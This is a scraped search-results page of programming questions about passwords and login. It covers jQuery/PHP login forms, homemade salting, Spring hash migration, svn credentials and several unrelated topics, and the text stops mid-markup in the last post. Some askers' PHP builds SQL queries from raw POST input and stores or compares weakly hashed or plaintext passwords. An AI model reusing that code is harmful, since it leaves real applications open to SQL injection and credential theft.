Search Results

Search found 15010 results on 601 pages for 'password protected'.

facebook twitter digg google delicious technorati stumbleupon myspace wordpress linkedin gmail igoogle windows live tumblr viadeo yahoo buzz yahoo mail yahoo bookmarks favorites email print

Page 85/601 | < Previous Page | 81 82 83 84 85 86 87 88 89 90 91 92  | Next Page >

  • jQuery mobile ajax login form authentication

    - by Jakub Zak
    I know i already asked simillar question, but now when I work with jQuery Mobile I can't figure it out. So I have this form: <div data-role="page" data-theme="a" id="login_page"> <div data-role="header" data-position="fixed"> <h1>****</h1> </div> <div data-role="content"> <form id="login_form" method="POST" data-ajax="false"> <label for="basic">Username:</label> <input type="text" name="name" id="username" value=""/> <label for="basic">Password:</label> <input type="password" name="password" id="password" value=""/> <input type="submit" value="Login" id="login" name="login"/> </form> </div> <div data-role="footer" data-position="fixed"> <div data-role="navbar"></div> </div> </div> And I need to submit Username and Password to php script, where php replies and send "success" or "failed". Here is php: <?php session_start(); $username = $_POST["name"]; $password = $_POST["password"]; include('mysql_connection.php'); mysql_select_db("jzperson_imesUsers", $con); $res1 = mysql_query("SELECT * FROM temp_login WHERE username='$username' AND password='$password'"); $count=mysql_num_rows($res1); if($count==1){ echo "success"; }else{ echo "failed"; } ?> And to do all this I want to use this script: $(document).ready(function() { $("form").submit(function(){ $.mobile.showPageLoadingMsg(); $.ajax({ url: "http://imes.jzpersonal.com/login_control.php", type: "POST", dataType: "jsonp", jsonp: "jsoncallback", data: $("form#login_form").serialize(), success: function( response ){ $.mobile.changePage( "http://imes.jzpersonal.com/user_panel.html"); } }); return false; }); }); But I can't make it work, I know I must have mistakes in there, I just can't find them, or better way to do it. Thank you in advance for any help.

    Read the article

  • PHP, MySQL - My own version of SALT (I call salty) - Login Issue

    - by Fabio Anselmo
    Ok I wrote my own version of SALT I call it salty lol don't make fun of me.. Anyway the registration part of my script as follows is working 100% correctly. //generate SALTY my own version of SALT and I likes me salt.. lol function rand_string( $length ) { $chars = "ABCDEFGHIJKLMNOPQRSTUWXYZabcdefghijklmnopqrstuwxyz1234567890"; $size = strlen( $chars ); for( $i = 0; $i < $length; $i++ ) { $str .= $chars[ rand( 0, $size - 1 ) ]; } return $str; } $salty = rand_string( 256 ); //generate my extra salty pw $password = crypt('password'); $hash = $password . $salty; $newpass = $hash; //insert the data in the database include ('../../scripts/dbconnect.php'); //Update db record with my salty pw ;) // TESTED WITH AND WITHOUT SALTY //HENCE $password and $newpass mysql_query("UPDATE `Register` SET `Password` = '$password' WHERE `emailinput` = '$email'"); mysql_close($connect); However my LOGIN script is failing. I have it setup to TEST and echo if its login or not. It always returns FAILED. I entered the DB and changed the crypted salty pw to "TEST" and I got a SUCCESS. So my problem is somewhere in this LOGIN script I assume. Now I am not sure how to implement my $Salty in this. But also be advised that even without SALTY (just using crypt to store my pass) - I was still unable to perform a login successfully. And if you're gonna suggest i use blowfish - note that my webhost doesn't have it supported and i don't know how to install it. here's my login script: if (isset($_POST['formsubmitted'])) { include ('../../scripts/dbconnect.php'); $username = mysql_real_escape_string($_POST['username']); $password = crypt(mysql_real_escape_string($_POST['password'])); $qry = "SELECT ID FROM Register WHERE emailinput='$username' AND Password='$password'"; $result = mysql_query($qry); if(mysql_num_rows($result) > 0) { echo 'SUCCESS'; //START SESSION } else { echo 'FAILED'; //YOU ARE NOT LOGGED IN } } So what's wrong with this login? Why isn't it working just using the crypt/storing only crypt? How can i make it work storing both the crypt and randomly generated SALTY :) ? Ty advance

    Read the article

  • In order to bypass a website's login screen, can you load a link with a username and password?

    - by Jeff
    I am relatively new to web development, and I was hoping I could get some pointers about the feasibility of a feature I would like to implement. Is it possible to have a url link that you can click on, that can contain login credentials for the website it is linking to, so as to bypass that websites login screen? In other words, can I make a link from my website to facebook, that would allow me to login right in to my facebook, from any computer? Meaning, if I don't have cookies to store my login info in, is it possible to login still? This is just a conceptual question, so any help would be appreciated! Thanks!

    Read the article

  • How to change password hashing algorithm when using spring security?

    - by harry
    I'm working on a legacy Spring MVC based web Application which is using a - by current standards - inappropriate hashing algorithm. Now I want to gradually migrate all hashes to bcrypt. My high level strategy is: New hashes are generated with bcrypt by default When a user successfully logs in and has still a legacy hash, the app replaces the old hash with a new bcrypt hash. What is the most idiomatic way of implementing this strategy with Spring Security? Should I use a custom Filter or my on AccessDecisionManager or …?

    Read the article

  • Is there an easy way to add a secure file upload form (username, password, select file) to a website

    - by user346602
    Hi, I am very new to website design. Have an architect who wants his clients to enable his clients to upload (ftp - but don't know if http could be a better alternative?) files (plans etc.) to him, through the website I'm designing for him. I have seen similar things available on printers websites... I have seen uploadify, but it requires flash (I can only code HTML, CSS and a tiny bit of PHP), and don't think it is a secure option. I have also seen net2ftp, but don't really understand how it works. Any direction would be sincerely appreciated.

    Read the article

  • How to ReHash a password stored into my Database ? (PHP)

    - by Vincent Roye
    Hi! I have some passwords encrypted in my database and I would like to find a way to display them. Here is how they are saved into my mysql database: function generateHash($plainText, $salt = null){ if ($salt === null) { $salt = substr(md5(uniqid(rand(), true)), 0, 25); } else { $salt = substr($salt, 0, 25); } return $salt . sha1($salt . $plainText); } $secure_pass = generateHash($this->clean_password); Then $secure_pass is saved into my database. Anyone would have an idea ?? Thank you very much ;)

    Read the article

  • JAAS : on Callback ( Interesting based on HTTP headers )

    - by VJS
    I am using NameCallback and PasswordCallback for username and password.For username and password, popup comes on browser and when i enter username ans password, JAAS authenticates my request. On the wireshark, I have seen that 401 Unauthorized message (WWW-Authenticate header)comes and when i enter username/password HTTP request with credentials generate ( with Authorization header) and goes to server. My requirement : I don't want pop up to come.My application on other server having username / password, so once it received 401 then based on some logic it will generate HTTP request with Authorization header / credentials and sent it back. FLow : User - Other Server - My Tomcat5.5 Here on Other Server, nobody is available to enter username/password manually.Application is deployed and it will only generate HTTP request with credential and sent it back to tomcat. Can we have any other callback which behave like this.Need your help.Please provide me feedback as well related to approach.

    Read the article

  • jQuery validation plugin addMethod firing incorrectly

    - by LoganEtherton
    I must be missing something obvious, but everything that I've tried for this is leaving me empty handed, so I'm a bit puzzled. I'm attempting to use the jQuery validation plugin with custom validation methods, but it seems to be hit or miss. It seems that I am able to successfully add rules to a certain extent, but some of the methods are not applied. Or the specified method is not applied, and the incorrect method is instead applied. So, for example, this works without a hitch: $.validator.addMethod("emailValidation", function(value, element) { return /^((([a-z]|\d|[!#\$%&'\*\+\-\/=\?\^_`{\|}~]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])+(\.([a-z]|\d|[!#\$%&'\*\+\-\/=\?\^_`{\|}~]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])+)*)|((\x22)((((\x20|\x09)*(\x0d\x0a))?(\x20|\x09)+)?(([\x01-\x08\x0b\x0c\x0e-\x1f\x7f]|\x21|[\x23-\x5b]|[\x5d-\x7e]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(\\([\x01-\x09\x0b\x0c\x0d-\x7f]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF]))))*(((\x20|\x09)*(\x0d\x0a))?(\x20|\x09)+)?(\x22)))@((([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|\d|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.)+(([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])|(([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])([a-z]|\d|-|\.|_|~|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])*([a-z]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])))\.?$/.test(value); }, "Please enter a valid email address." ); $.validator.addMethod("password", function(value, element) { return /[^\s]{6,25}/.test(value); }, "Please enter a password between 6 and 25 characters long." ); ... $(function(){ $("#registrationForm").validate({ rules: { email: { required: true, emailValidation: true }, password: { required: true, password: true }, } }); }); Both the password validation and email validation work. But then I add, in the same exact manner, a validation test for names. So, right below where the password method ends, I add: $.validator.addMethod("name", function(value, element) { return /[^\s]{6,25}/.test(value); }, "Please enter a valid name." ); Which turns the validate call into: $(function(){ $("#registrationForm").validate({ rules: { email: { required: true, emailValidation: true }, password: { required: true, password: true }, studentFirstName: { name: true } } }); }); And suddenly, everything is only validating for names. Both the email and password fields now validate using the name method, as does the name field. This is confusing! I've added console.log calls to all methods, and indeed, it's not that one is being called after the other - the only one being called is name. I've checked and double checked that the element selection is good. I've checked that everything is groovy with the methods themselves. Any ideas?

    Read the article

  • How do I make a jumping dolphin rotate realistically?

    - by Johnny
    I want to program a dolphin that jumps and rotates like a real dolphin. Jumping is not the problem, but I don't know how to make the rotation. At the moment, my dolphin rotates a little weird. But I want that it rotates like a real dolphin does. How can I improve the rotation? public class Game1 : Microsoft.Xna.Framework.Game { GraphicsDeviceManager graphics; SpriteBatch spriteBatch; Texture2D image, water; float Gravity = 5.0F; float Acceleration = 20.0F; Vector2 Position = new Vector2(1200,720); Vector2 Velocity; float rotation = 0; SpriteEffects flip; Vector2 Speed = new Vector2(0, 0); public Game1() { graphics = new GraphicsDeviceManager(this); Content.RootDirectory = "Content"; graphics.PreferredBackBufferWidth = 1280; graphics.PreferredBackBufferHeight = 720; } protected override void Initialize() { base.Initialize(); } protected override void LoadContent() { spriteBatch = new SpriteBatch(GraphicsDevice); image = Content.Load<Texture2D>("cartoondolphin"); water = Content.Load<Texture2D>("background"); flip = SpriteEffects.None; } protected override void Update(GameTime gameTime) { float VelocityX = 0f; float VelocityY = 0f; float time = (float)gameTime.ElapsedGameTime.TotalSeconds; KeyboardState kbState = Keyboard.GetState(); if(kbState.IsKeyDown(Keys.Left)) { rotation = 0; flip = SpriteEffects.None; VelocityX += -5f; } if(kbState.IsKeyDown(Keys.Right)) { rotation = 0; flip = SpriteEffects.FlipHorizontally; VelocityX += 5f; } // jump if the dolphin is under water if(Position.Y >= 670) { if (kbState.IsKeyDown(Keys.A)) { if (flip == SpriteEffects.None) { rotation += 0.01f; VelocityY += 40f; } else { rotation -= 0.01f; VelocityY += 40f; } } } else { if (flip == SpriteEffects.None) { rotation -= 0.01f; VelocityY += -10f; } else { rotation += 0.01f; VelocityY += -10f; } } float deltaY = 0; float deltaX = 0; deltaY = Gravity * (float)gameTime.ElapsedGameTime.TotalSeconds; deltaX += VelocityX * (float)gameTime.ElapsedGameTime.TotalSeconds * Acceleration; deltaY += -VelocityY * (float)gameTime.ElapsedGameTime.TotalSeconds * Acceleration; Speed = new Vector2(Speed.X + deltaX, Speed.Y + deltaY); Position += Speed * (float)gameTime.ElapsedGameTime.TotalSeconds; Velocity.X = 0; if (Position.Y + image.Height/2 > graphics.PreferredBackBufferHeight) Position.Y = graphics.PreferredBackBufferHeight - image.Height/2; base.Update(gameTime); } protected override void Draw(GameTime gameTime) { GraphicsDevice.Clear(Color.CornflowerBlue); spriteBatch.Begin(); spriteBatch.Draw(water, new Rectangle(0, graphics.PreferredBackBufferHeight -100, graphics.PreferredBackBufferWidth, 100), Color.White); spriteBatch.Draw(image, Position, null, Color.White, rotation, new Vector2(image.Width / 2, image.Height / 2), 1, flip, 1); spriteBatch.End(); base.Draw(gameTime); } } I changed my code a little. But I still have some trouble with the rotation. Here's the entire code. The dolphin looks at the wrong direction if I press the left or right key. For example, it looks down if I press the left key. What is wrong with the rotation? At the beginning, the dolphin looks at the left side, but after I pressed a key it just looks down or up. I deleted the "rotation += 0.01f;" lines in the code. Is that correct? public class Game1 : Microsoft.Xna.Framework.Game { GraphicsDeviceManager graphics; SpriteBatch spriteBatch; Texture2D image, water; float Gravity = 5.0F; float Acceleration = 20.0F; Vector2 Position = new Vector2(1200,720); Vector2 Velocity; float rotation = 0; SpriteEffects flip; Vector2 Speed = new Vector2(0, 0); Vector2 prevPos; public Game1() { graphics = new GraphicsDeviceManager(this); Content.RootDirectory = "Content"; graphics.PreferredBackBufferWidth = 1280; graphics.PreferredBackBufferHeight = 720; } protected override void Initialize() { base.Initialize(); } protected override void LoadContent() { spriteBatch = new SpriteBatch(GraphicsDevice); image = Content.Load<Texture2D>("cartoondolphin"); water = Content.Load<Texture2D>("background"); flip = SpriteEffects.None; } protected override void Update(GameTime gameTime) { float VelocityX = 0f; float VelocityY = 0f; float time = (float)gameTime.ElapsedGameTime.TotalSeconds; KeyboardState kbState = Keyboard.GetState(); if(kbState.IsKeyDown(Keys.Left)) { flip = SpriteEffects.None; VelocityX += -5f; } if(kbState.IsKeyDown(Keys.Right)) { flip = SpriteEffects.FlipHorizontally; VelocityX += 5f; } rotation = (float)Math.Atan2(Position.X - prevPos.X, Position.Y - prevPos.Y); prevPos = Position; // jump if the dolphin is under water if(Position.Y >= 670) { if (kbState.IsKeyDown(Keys.A)) { if (flip == SpriteEffects.None) { VelocityY += 40f; } else { VelocityY += 40f; } } } else { if (flip == SpriteEffects.None) { VelocityY += -10f; } else { VelocityY += -10f; } } float deltaY = 0; float deltaX = 0; deltaY = Gravity * (float)gameTime.ElapsedGameTime.TotalSeconds; deltaX += VelocityX * (float)gameTime.ElapsedGameTime.TotalSeconds * Acceleration; deltaY += -VelocityY * (float)gameTime.ElapsedGameTime.TotalSeconds * Acceleration; Speed = new Vector2(Speed.X + deltaX, Speed.Y + deltaY); Position += Speed * (float)gameTime.ElapsedGameTime.TotalSeconds; Velocity.X = 0; if (Position.Y + image.Height/2 > graphics.PreferredBackBufferHeight) Position.Y = graphics.PreferredBackBufferHeight - image.Height/2; base.Update(gameTime); } protected override void Draw(GameTime gameTime) { GraphicsDevice.Clear(Color.CornflowerBlue); spriteBatch.Begin(); spriteBatch.Draw(water, new Rectangle(0, graphics.PreferredBackBufferHeight -100, graphics.PreferredBackBufferWidth, 100), Color.White); spriteBatch.Draw(image, Position, null, Color.White, rotation, new Vector2(image.Width / 2, image.Height / 2), 1, flip, 1); spriteBatch.End(); base.Draw(gameTime); } }

    Read the article

  • How can I make subversion reset the stored passwords/users and remember my authentication credential

    - by NicDumZ
    Hello folks! Background: I used to have everything working just fine on my fresh install: $ svn co https://domain:443/ test1 Error validating server certificate for 'https://domain:443': - The certificate is not issued by a trusted authority. Use the fingerprint to validate the certificate manually! Certificate information: - Hostname: **REMOVED** - Valid: **REMOVED** - Issuer: **REMOVED** - Fingerprint: **checked with issuer and REMOVED** (R)eject, accept (t)emporarily or accept (p)ermanently? p Authentication realm: <https://domain:443> Subversion repository Password for 'nicdumz-machine-hostname': Authentication realm: <https://domain:443> Subversion repository Username: nicdumz Password for 'nicdumz': # proceeds to checkout correctly $ svn co https://domain:443/ test2 # checkouts nicely, without asking for my password. At some point I needed to commit stuff using a different account. So I did that $ svn ci --username other.user Authentication realm: <https://domain:443> Subversion repository Password for 'other.user': # works fine But since then, everytime I want to commit as 'nicdumz' (default user, all repos have been checked-out with that user), it prompts me for my password: $ svn ci Authentication realm: <https://domain:443> Subversion repository Password for 'nicdumz': Hey come on, why :) The same happens if I want a fresh checkout, since read-access is also protected. So I tried fixing the issue by myself. I read around that ~/.subversion/auth was storing credentials, so I removed it from the way: $ cd ~/.subversion $ mv auth oldauth $ mkdir auth It seemed to work at first, because svn had forgotten about certificate validation: $ svn co https://domain:443/ test3 Error validating server certificate for 'https://domain:443': - The certificate is not issued by a trusted authority. Use the fingerprint to validate the certificate manually! Certificate information: - Hostname: **REMOVED** - Valid: **REMOVED** - Issuer: **REMOVED** - Fingerprint: **checked with issuer and REMOVED** (R)eject, accept (t)emporarily or accept (p)ermanently? p Authentication realm: <https://domain:443> Subversion repository Password for 'nicdumz-machine-hostname': Authentication realm: <https://domain:443> Subversion repository Username: nicdumz Password for 'nicdumz': # proceeds to checkout correctly $ svn up Authentication realm: <https://domain:443> Subversion repository Password for 'nicdumz': What? how is this happening? If you have suggestions to investigate more about the behaviour, I am very interested. If I'm correct, there is no way to do a verbose svn up or anything of the like, so I'm not sure should I go for investigation. Oh, and for what it's worth: $ svn --version svn, version 1.6.6 (r40053) compiled Oct 26 2009, 06:19:08 Copyright (C) 2000-2009 CollabNet. Subversion is open source software, see http://subversion.tigris.org/ This product includes software developed by CollabNet (http://www.Collab.Net/). The following repository access (RA) modules are available: * ra_neon : Module for accessing a repository via WebDAV protocol using Neon. - handles 'http' scheme - handles 'https' scheme * ra_svn : Module for accessing a repository using the svn network protocol. - with Cyrus SASL authentication - handles 'svn' scheme * ra_local : Module for accessing a repository on local disk. - handles 'file' scheme * ra_serf : Module for accessing a repository via WebDAV protocol using serf. - handles 'http' scheme - handles 'https' scheme

    Read the article

  • AddHandler not working?

    - by EdenMachine
    I can't figure out why my addhandler is not firing? In the Sub "CreateTagStyle" thd AddHandler is to firing when the LinkButton is clicked Is there some reason that addhandlers can't be adding at certain points of the page lifecycle? <%@ Page Title="" Language="VB" MasterPageFile="~/_Common/Admin.master" %> <script runat="server"> Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) End Sub Protected Sub RadGrid1_NeedDataSource(ByVal source As Object, ByVal e As Telerik.Web.UI.GridNeedDataSourceEventArgs) If Not e.IsFromDetailTable Then Dim forms As New MB.RequestFormPacket() RadGrid1.DataSource = forms.GetPackets() End If End Sub Protected Sub RadGrid1_DetailTableDataBind(ByVal source As Object, ByVal e As Telerik.Web.UI.GridDetailTableDataBindEventArgs) Select Case e.DetailTableView.Name Case "gtvForms" Dim PacketID As Guid = e.DetailTableView.ParentItem.GetDataKeyValue("ID") e.DetailTableView.DataSource = MB.RequestForm.GetRequestForms(PacketID) End Select End Sub Protected Sub RadGrid1_InsertCommand(ByVal source As Object, ByVal e As Telerik.Web.UI.GridCommandEventArgs) If IsValid Then Select Case TryCast(e.Item.NamingContainer.NamingContainer, GridTableView).Name Case "gtvPackets" Dim rtbName As RadTextBox = TryCast(e.Item.FindControl("rtbName"), RadTextBox) Dim IsActive As Boolean = TryCast(e.Item.FindControl("cbxIsActive"), CheckBox).Checked Dim packet As New MB.RequestFormPacket() packet.Name = rtbName.Text packet.IsActive = IsActive packet.Insert() e.Canceled = True e.Item.OwnerTableView.IsItemInserted = False RadGrid1.Rebind() System.Web.UI.ScriptManager.RegisterStartupScript(Me.Page, Me.GetType(), "ClientMessage", "SuccessMessage('Request Form Packet has been added successfully.');", True) Case "gtvForms" Dim parentItem As GridDataItem = e.Item.OwnerTableView.ParentItem Dim rcbForms As RadComboBox = TryCast(e.Item.FindControl("rcbForms"), RadComboBox) Dim rf As New MB.RequestForm() rf.RequestFormPacketID = CType(parentItem.OwnerTableView.DataKeyValues(parentItem.ItemIndex)("ID"), Guid) rf.FormID = rcbForms.SelectedValue If MB.RequestFormPacket.HasItems(rf.RequestFormPacketID) Then rf.SortOrder = rf.MaxSortOrder + 1 Else rf.SortOrder = 0 End If rf.Insert() e.Canceled = True e.Item.OwnerTableView.IsItemInserted = False TryCast(e.Item.NamingContainer.NamingContainer, GridTableView).Rebind() End Select End If End Sub Protected Sub RadGrid1_UpdateCommand(ByVal source As Object, ByVal e As Telerik.Web.UI.GridCommandEventArgs) If IsValid Then Select Case TryCast(e.Item.NamingContainer, GridTableView).Name Case "gtvPackets" Dim PacketID As Guid = CType(CType(e.CommandSource, Button).NamingContainer, GridEditFormItem).GetDataKeyValue("ID") Dim Name As String = TryCast(e.Item.FindControl("rtbName"), RadTextBox).Text Dim Tags As String = TryCast(e.Item.FindControl("hdnTags"), HiddenField).Value Dim IsActive As Boolean = TryCast(e.Item.FindControl("cbxIsActive"), CheckBox).Checked Dim rfp As New MB.RequestFormPacket() rfp.Update(PacketID, Name, IsActive) Call MB.RequestFormPacketTag.Insert(PacketID, Tags) e.Item.Edit = False TryCast(e.Item.NamingContainer, GridTableView).Rebind() System.Web.UI.ScriptManager.RegisterStartupScript(Me.Page, Me.GetType(), "ClientMessage", "SuccessMessage('Request Form Packet has been updated successfully.');", True) Case "gtvForms" Dim RequestFormID As Guid = CType(CType(e.CommandSource, Button).NamingContainer, GridEditFormItem).GetDataKeyValue("ID") Dim rcbForms As RadComboBox = TryCast(e.Item.FindControl("rcbForms"), RadComboBox) Dim rf As New MB.RequestForm() rf.Update(RequestFormID, rcbForms.SelectedValue) e.Item.Edit = False TryCast(e.Item.NamingContainer, GridTableView).Rebind() End Select End If End Sub Protected Sub RadGrid1_DeleteCommand(ByVal source As Object, ByVal e As Telerik.Web.UI.GridCommandEventArgs) Dim editedItem As GridEditableItem = TryCast(e.Item, GridEditableItem) Select Case CType(editedItem.Parent.Parent, GridTableView).Name Case "gtvPackets" Dim ID As Guid = CType(CType(e.CommandSource, ImageButton).NamingContainer, GridDataItem).GetDataKeyValue("ID") MB.RequestFormPacket.Delete(ID) System.Web.UI.ScriptManager.RegisterStartupScript(Me.Page, Me.GetType(), "ClientMessage", "NotifyMessage('Request Form Packet has been deleted.');", True) Case "gtvForms" Dim ID As Guid = CType(CType(e.CommandSource, ImageButton).NamingContainer, GridDataItem).GetDataKeyValue("ID") MB.RequestForm.Delete(ID) System.Web.UI.ScriptManager.RegisterStartupScript(Me.Page, Me.GetType(), "ClientMessage", "NotifyMessage('Request Form has been removed.');", True) End Select End Sub Protected Sub ibnItemUpArrow_Command(ByVal sender As Object, ByVal e As System.Web.UI.WebControls.CommandEventArgs) Dim gtv As GridTableView = CType(CType(sender, ImageButton).NamingContainer.NamingContainer, GridTableView) Dim ID As Guid = New Guid(e.CommandArgument.ToString()) Call MB.RequestForm.MoveUp(ID) gtv.Rebind() End Sub Protected Sub ibnItemDownArrow_Command(ByVal sender As Object, ByVal e As System.Web.UI.WebControls.CommandEventArgs) Dim gtv As GridTableView = CType(CType(sender, ImageButton).NamingContainer.NamingContainer, GridTableView) Dim ID As Guid = New Guid(e.CommandArgument.ToString()) Call MB.RequestForm.MoveDown(ID) gtv.Rebind() End Sub Protected Sub RadGrid1_RowDrop(ByVal sender As Object, ByVal e As Telerik.Web.UI.GridDragDropEventArgs) If String.IsNullOrEmpty(e.HtmlElement) Then If e.DraggedItems(0).OwnerGridID = RadGrid1.ClientID Then If e.DestDataItem IsNot Nothing Then Dim gtv As GridTableView = CType(e.DestDataItem.NamingContainer, GridTableView) For Each gdi As GridDataItem In e.DraggedItems Select Case gtv.Name Case "gtvForms" MB.RequestForm.DragAndDropReorder(gdi.GetDataKeyValue("ID"), e.DestDataItem.GetDataKeyValue("ID"), IIf(e.DropPosition = GridItemDropPosition.Above, True, False)) gtv.Rebind() End Select Next End If End If End If End Sub Protected Sub cbxAllowDragAndDrop_CheckedChanged(ByVal sender As Object, ByVal e As System.EventArgs) Dim cbx As CheckBox = CType(sender, CheckBox) If cbx.Checked Then RadGrid1.ClientSettings.AllowRowsDragDrop = True RadGrid1.ClientSettings.Selecting.AllowRowSelect = True RadGrid1.ClientSettings.Selecting.EnableDragToSelectRows = True Else RadGrid1.ClientSettings.AllowRowsDragDrop = False RadGrid1.ClientSettings.Selecting.AllowRowSelect = False RadGrid1.ClientSettings.Selecting.EnableDragToSelectRows = False End If End Sub Protected Sub ibnDisableToggleProcess_Click(ByVal sender As Object, ByVal e As System.Web.UI.ImageClickEventArgs) Dim ibn As ImageButton = CType(sender, ImageButton) Dim hdn As HiddenField = CType(ibn.NamingContainer.FindControl("hdnDisableProcessID"), HiddenField) Dim status As Boolean = MB.RequestFormPacket.ActivateToggle(New Guid(hdn.Value)) Dim gtv As GridTableView = CType(ibn.NamingContainer.NamingContainer, GridTableView) gtv.Rebind() System.Web.UI.ScriptManager.RegisterStartupScript(Me.Page, Me.GetType(), "ClientMessage", "SuccessMessage('Process has been " & IIf(status, "Activated", "Deactivated") & ".');", True) End Sub Protected Function DisplayTagList(ByVal tags As IEnumerable(Of MB.RequestFormPacketTag)) As String Dim list As String = "" For Each t As MB.RequestFormPacketTag In tags list += "<span class=""tags"">" & t.Tag.Name & "</span>" Next Return list End Function Protected Sub RadGrid1_ItemDataBound(ByVal sender As Object, ByVal e As Telerik.Web.UI.GridItemEventArgs) Select Case e.Item.GetType.Name Case "GridEditFormInsertItem" 'do nothing Case "GridEditFormItem" Dim plh As PlaceHolder = CType(e.Item.FindControl("plhTags"), PlaceHolder) Dim hdn As HiddenField = CType(e.Item.FindControl("hdnTags"), HiddenField) If hdn IsNot Nothing Then Dim gefi As GridEditFormItem = e.Item Dim packet As MB.RequestFormPacket = gefi.DataItem For Each pt As MB.RequestFormPacketTag In packet.RequestFormPacketTags Call CreateTagStyle(plh, hdn, pt.Tag.Name) If hdn.Value = "" Then hdn.Value = "|" End If hdn.Value += pt.Tag.Name & "|" Next End If End Select End Sub Protected Sub btnAddTag_Click(ByVal sender As Object, ByVal e As System.EventArgs) Dim btnAddTag As Button = sender Dim rtbTags As RadTextBox = btnAddTag.NamingContainer.FindControl("rtbTags") Dim plhTags As PlaceHolder = btnAddTag.NamingContainer.FindControl("plhTags") Dim hdnTags As HiddenField = btnAddTag.NamingContainer.FindControl("hdnTags") Dim TagExists As Boolean = False rtbTags.Text = rtbTags.Text.ToUpper().Trim() Dim currentTags() As String = Split(hdnTags.Value, "|") For i As Integer = 1 To currentTags.Count - 2 Call CreateTagStyle(plhTags, hdnTags, currentTags(i)) Next If TagExists = False And String.IsNullOrEmpty(rtbTags.Text) = False Then Call CreateTagStyle(plhTags, hdnTags, rtbTags.Text) If String.IsNullOrEmpty(hdnTags.Value) Then hdnTags.Value = "|" End If hdnTags.Value += rtbTags.Text & "|" 'System.Web.UI.ScriptManager.RegisterStartupScript(Me.Page, Me.GetType(), "ClientMessage", "highlightTag('" & lbn.ClientID & "');", True) End If rtbTags.Text = "" rtbTags.Focus() End Sub Public Sub RemoveTag(ByVal sender As Object, ByVal e As EventArgs) Response.End() Dim lbnSender As LinkButton = sender Dim plhTags As PlaceHolder = lbnSender.NamingContainer.FindControl("plhTags") Dim hdnTags As HiddenField = lbnSender.NamingContainer.FindControl("hdnTags") Response.Write(hdnTags.Value) Response.End() Dim TagExists As Boolean = False Dim currentTags() As String = Split(hdnTags.Value, "|") For i As Integer = 1 To currentTags.Count - 2 Call CreateTagStyle(plhTags, hdnTags, currentTags(i)) Next End Sub Protected Sub CreateTagStyle(ByVal plh As PlaceHolder, ByVal hdn As HiddenField, ByVal tagName As String) Dim lbn As New LinkButton() lbn.ID = "lbn_" & hdn.ClientID & "_" & tagName lbn.CssClass = "deleteCreateTag" lbn.Text = "X" AddHandler lbn.Click, AddressOf RemoveTag plh.Controls.Add(New LiteralControl("<div><span class=showTag>" & tagName & "</span>")) plh.Controls.Add(lbn) plh.Controls.Add(New LiteralControl("</div>")) End Sub </script> <asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server"> <style type="text/css"> .tags { border:solid 1px #93AFE5; background-color:#F3F7F8; margin: 0px 2px 0px 2px; padding: 0px 4px 0px 4px; font-family:Verdana; font-size:10px; text-transform:uppercase; } </style> <script type="text/javascript"> function highlightTag(id) { $("#" + id).highlightFade({ color: '#FFFF99', speed: 2000, iterator: 'sinusoidal' }); } </script> </asp:Content> <asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" Runat="Server"> <telerik:RadAjaxManager ID="RadAjaxManager1" runat="server" DefaultLoadingPanelID="RadAjaxLoadingPanel1" EnableAJAX="false"> <AjaxSettings> <telerik:AjaxSetting AjaxControlID="RadGrid1"> <UpdatedControls> <telerik:AjaxUpdatedControl ControlID="RadGrid1" /> </UpdatedControls> </telerik:AjaxSetting> </AjaxSettings> </telerik:RadAjaxManager> <telerik:RadAjaxLoadingPanel ID="RadAjaxLoadingPanel1" runat="server" /> <telerik:RadTabStrip ID="RadTabStrip1" runat="server" Skin="WebBlue" style="position:relative;top:1px;" ValidationGroup="vgTabs"> <Tabs> <telerik:RadTab Text="Request Form Packets" Selected="true" ImageUrl="~/Admin/Images/Packet2.png" /> <telerik:RadTab Text="Request Forms" NavigateUrl="Forms.aspx" ImageUrl="~/Admin/Images/Forms.png" /> </Tabs> </telerik:RadTabStrip> <asp:ObjectDataSource ID="odsForms" runat="server" TypeName="MB.Form" SelectMethod="GetForms" /> <asp:Panel ID="pnlContent" runat="server" CssClass="ContentPanel"> <telerik:RadGrid ID="RadGrid1" runat="server" AllowPaging="True" AllowSorting="True" GridLines="None" OnNeedDataSource="RadGrid1_NeedDataSource" AllowAutomaticUpdates="true" AllowAutomaticDeletes="true" AllowAutomaticInserts="true" OnInsertCommand="RadGrid1_InsertCommand" OnUpdateCommand="RadGrid1_UpdateCommand" OnDeleteCommand="RadGrid1_DeleteCommand" OnRowDrop="RadGrid1_RowDrop" OnDetailTableDataBind="RadGrid1_DetailTableDataBind" OnItemDataBound="RadGrid1_ItemDataBound"> <%-----------------------------------------------------------%> <%------------------------- PACKETS -------------------------%> <%-----------------------------------------------------------%> <MasterTableView AutoGenerateColumns="False" DataKeyNames="ID" ClientDataKeyNames="ID" ShowHeadersWhenNoRecords="true" Name="gtvPackets" NoMasterRecordsText="There are currently no Request Form Packets" GroupLoadMode="Client" RetrieveNullAsDBNull="true" CommandItemDisplay="Top" AllowAutomaticUpdates="true" AllowAutomaticDeletes="true" AllowAutomaticInserts="true"> <RowIndicatorColumn> <HeaderStyle Width="20px"></HeaderStyle> </RowIndicatorColumn> <ExpandCollapseColumn> <HeaderStyle Width="20px"></HeaderStyle> </ExpandCollapseColumn> <CommandItemTemplate> <table width="100%"> <tr> <td class="AdminGridHeader">&nbsp;<img src="../Admin/Images/Packet2.png" align="absmiddle" width="16" height="16" />&nbsp;&nbsp;Request Form Packets</td> <td width="1%"><asp:CheckBox ID="cbxAllowDragAndDrop" 